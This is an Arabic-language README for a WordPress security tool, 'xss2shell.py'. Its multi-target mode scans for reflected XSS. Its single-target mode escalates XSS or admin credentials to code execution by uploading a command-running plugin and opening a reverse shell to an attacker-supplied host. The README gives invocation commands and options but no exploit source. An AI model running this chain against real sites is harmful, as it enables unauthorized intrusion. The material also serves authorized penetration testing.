
ماسح أمني لـ WordPress يحدد بصمات الإصدارات، ويكتشف ثغرات XSS المنعكسة عبر أهداف متعددة بشكل متزامن، ويدعم سير عمل استغلال مُصادَق من XSS إلى RCE للاختبار المُصرَّح به.
المطوّر: الفضل: YogaGymn
أداة PoC/فحص لاختبارات الأمان المصرّح بها على WordPress. يحتوي المشروع على مسار استغلال لهدف واحد ووضع فحص فقط متعدد الأهداف متزامن.
مهم: استخدم هذا المشروع فقط على تثبيتات WordPress التي تملكها أو التي لديك إذن صريح لاختبارها. الماسح متعدد الأهداف محدود عمدًا بتحديد الإصدار وكشف انعكاس XSS؛ فهو لا ينفّذ التقاط بيانات الاعتماد أو رفع إضافة أو RCE ضد قائمة أهداف.
يدعم السكربت الأصلي:
auto وxss وdirect.يدعم الماسح المضاف:
ThreadPoolExecutor.الوضع متعدد الأهداف لا يستدعي دوال RCE الأصلية.
requestsثبّت التبعية:
python3 -m pip install requests
إذا كان توزيع Linux لديك يستخدم بيئة Python مُدارة خارجيًا، فاستخدم بيئة افتراضية:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
استنسخ المشروع أو انسخه: الأصل من إكسبلويت yogaGymn
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
أو ببساطة ضع:
xss2shell.py
في دليل العمل الخاص بك.
أنشئ ملفًا باسم targets.txt أو alvos.txt:
https://example1.test
https://example2.test
https://example3.test
يتم تجاهل التعليقات والأسطر الفارغة:
# أهداف مختبر مصرّح به
https://example1.test
https://example2.test
شغّل الماسح:
python3 xss2shell.py -i targets.txt
التزامن الافتراضي هو 10 عمال (workers).
على سبيل المثال، استخدم 20 عاملًا:
python3 xss2shell.py -i targets.txt --workers 20
لمختبر صغير:
python3 xss2shell.py -i targets.txt --workers 5
لا تختر عددًا مرتفعًا دون داعٍ من workers، فقد يزيد ذلك من حمل الاتصالات ويؤدي إلى تفعيل حدود المعدل أو الضوابط الدفاعية.
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
يستخدم scan_results.txt الافتراضي حقولًا مفصولة بعلامات تبويب:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
مثال:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
الحالة المعنى
XSS_REFLECTION_DETECTED رصد الماسح سلوك انعكاس HTML
المختبر. هذا ليس بحد ذاته دليلًا
على RCE.
XSS_NOT_DETECTED لم يتم رصد الانعكاس المختبر.
ERROR واجه الفحص استثناءً.يمكن للماسح الإبلاغ عن تفاصيل مثل:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTEDتصف هذه القيم الاستجابة التي لاحظتها روتين الكشف؛ ويجب التحقق منها يدويًا قبل اعتبار النتيجة ثغرة مؤكدة.
يدعم السكربت الأصلي أيضًا وسيطات هدف واحد.
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
يمكن لسير عمل XSS/المباشر إنشاء أو تفعيل إضافة تحتوي على وظيفة تنفيذ أوامر. استخدمها فقط في بيئة اختبار مصرّح بها.
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
الوسيط الوصف
target عنوان URL لهدف واحد.
-i, --input ملف يحتوي على أهداف متعددة.
--output ملف الإخراج لنتائج الأهداف
المتعددة. الافتراضي:
scan_results.txt.
--workers عدد العمال المتزامنين.
الافتراضي: 10.
--mode وضع الهدف الواحد الأصلي:
auto أو xss أو direct.
-u, --username اسم مستخدم WordPress لسير العمل
المباشر/الاحتياطي الأصلي.
-p, --password كلمة مرور WordPress لسير العمل
المباشر/الاحتياطي الأصلي.
--lhost مضيف الاستدعاء/القشرة العكسية
لـ PoC الأصلي.
--lport منفذ القشرة العكسية. الافتراضي:
4444.
--slug معرّف الإضافة (slug). الافتراضي:
xss2shell.
--callback-port منفذ خادم الاستدعاء. الافتراضي:
9090.
--no-rev تخطّي تشغيل القشرة العكسية في
سير العمل الأصلي.يستخدم الوضع متعدد الأهداف الميزة التالية من Python:
ThreadPoolExecutor
يتم إرسال كل هدف كمهمة فحص مستقلة:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
يتم جمع النتائج عند اكتمال المهام، بينما يتم إنشاء الإخراج النهائي وفقًا للترتيب الأصلي للأهداف.
تم تصميم الوضع متعدد الأهداف لتقييمات الأمان المصرّح بها وبيئات المختبر.
سير العمل الموصى به:
targets.txt.لا تستخدم الماسح ضد أنظمة أطراف ثالثة دون إذن.
الماسح ليس أداة كاملة لتقييم الثغرات.
على وجه الخصوص:
unknown (غير معروف) لا تعني أن الهدف قابل للاختراق..
├── xss2shell.py
├── targets.txt
└── scan_results.txt
لا توجد معلومات حول الترخيص في الكود المصدري المقدم.
إذا تم نشر هذا المشروع علنًا، أضف ملف ترخيص صريحًا مثل LICENSE. هذا الكود هو تطوير لاحق للكود الأصلي من ZSecurity.